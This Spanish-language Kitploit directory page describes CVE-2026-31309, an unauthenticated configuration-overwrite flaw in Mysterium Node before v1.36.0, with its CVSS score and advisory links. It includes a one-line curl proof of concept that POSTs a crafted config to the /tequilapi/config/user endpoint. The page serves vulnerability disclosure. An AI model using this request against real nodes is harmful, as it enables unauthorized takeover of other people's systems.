Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-31309 — Control de acceso inadecuado en Mysterium Node anterior a v1.36.0 | Kitploit
Herramientas/GitHubGitHub/sch8ill/cve-2026-31309
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

Control de acceso inadecuado en Mysterium Node anterior a v1.36.0

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2026-31309: Control de Acceso Inadecuado en Mysterium Node anterior a v1.36.0

La autorización inadecuada en el endpoint /tequilapi/config/user de Mysterium Node desde v1.21.1-rc0 hasta antes de v1.36.0 permite que un atacante no autenticado sobrescriba arbitrariamente la configuración del nodo y logre una toma completa del nodo mediante una solicitud POST manipulada.

CVSS

Puntuación: 9.8 (CRÍTICO)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

Descubierto por Till Schacht.

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
Descargar herramienta